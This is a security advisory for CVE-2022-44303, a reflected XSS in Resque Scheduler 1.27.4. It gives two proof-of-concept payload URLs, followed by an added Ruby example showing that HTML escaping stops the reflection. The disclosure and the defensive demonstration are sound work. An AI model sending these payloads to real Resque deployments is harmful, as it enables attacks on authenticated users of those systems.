# Resque 1.27.4 - Multiple Reflected XSS in Resque Schedule Job

## **CVE-2022-44303**

**Date:** 24/10/2022

**Exploit Author:** TrungVM of VietSunshine Cyber Security Services

**Affected Version(s):** Resque Scheduler version 1.27.4

**Description:** Resque Scheduler version 1.27.4 is vulnerable to reflected cross-site scripting (XSS). A remote attacker could inject JavaScript code into the "**{schedule\_job}**" or "**args**" parameter in */resque/delayed/jobs/{schedule\_job}?args={args\_id}* to execute JavaScript on the client side.

**Steps to reproduce:** An attacker sends a crafted URL *https\://{IP}/resque/delayed/jobs/{schedule\_job}?args={args\_id}* to a victim. When an authenticated victim opens the URL, the XSS is triggered.

**Payload example:**

* **Ex1:** *https\://{IP}/resque/delayed/jobs/%3Csvg%20onload=alert(document.domain)*
* **Ex2:** *https\://{IP}/resque/delayed/jobs/EventEmailSalesTeamBefore48hrsJob?args=\[%2249213%3Cimg+src=x+onerror=alert(document.domain)%3E%22]*
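
The reflection described above, and the output encoding that neutralises it, as an added example that is not part of the original advisory and is not resque-scheduler's code. The two ERB templates, `render_view` and `markup_reflected?` are hypothetical stand-ins for a view that echoes the job class from the path and the `args` query value; the inputs are the two payload strings listed above.

```ruby
require 'erb'
require 'uri'

# Hypothetical views: one echoes request data raw, one HTML-escapes it.
UNSAFE_VIEW = ERB.new('<h1><%= klass %></h1><td><%= args %></td>')
SAFE_VIEW   = ERB.new('<h1><%= h(klass) %></h1><td><%= h(args) %></td>')

# HTML-escape helper: encodes & < > " ' so the browser treats the value as text.
def h(text)
  ERB::Util.html_escape(text.to_s)
end

# Decode the path segment and the args value as a web framework would,
# then render them through the given template.
def render_view(template, path_segment, query_args)
  klass = URI.decode_www_form_component(path_segment)
  args  = URI.decode_www_form_component(query_args.to_s)
  template.result(binding)
end

# Simple regression check: did an <svg> or <img> tag survive into the HTML?
def markup_reflected?(html)
  html.match?(/<(svg|img)\b/i)
end

# Path segment and args value from Ex1 and Ex2 in the advisory.
SAMPLES = [
  ['%3Csvg%20onload=alert(document.domain)', nil],
  ['EventEmailSalesTeamBefore48hrsJob',
   '[%2249213%3Cimg+src=x+onerror=alert(document.domain)%3E%22]']
].freeze

# Returns one row per sample: [reflected when raw?, reflected when escaped?]
def compare_views
  SAMPLES.map do |path_segment, query_args|
    [markup_reflected?(render_view(UNSAFE_VIEW, path_segment, query_args)),
     markup_reflected?(render_view(SAFE_VIEW, path_segment, query_args))]
  end
end

compare_views.each_with_index do |(raw, escaped), i|
  puts "Ex#{i + 1}: raw view reflects markup=#{raw}, escaped view reflects markup=#{escaped}"
end
```

Both inputs need escaping at the point of output: Ex1 arrives through the path segment and Ex2 through the query string, so a check on only one of them leaves the other reflected.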
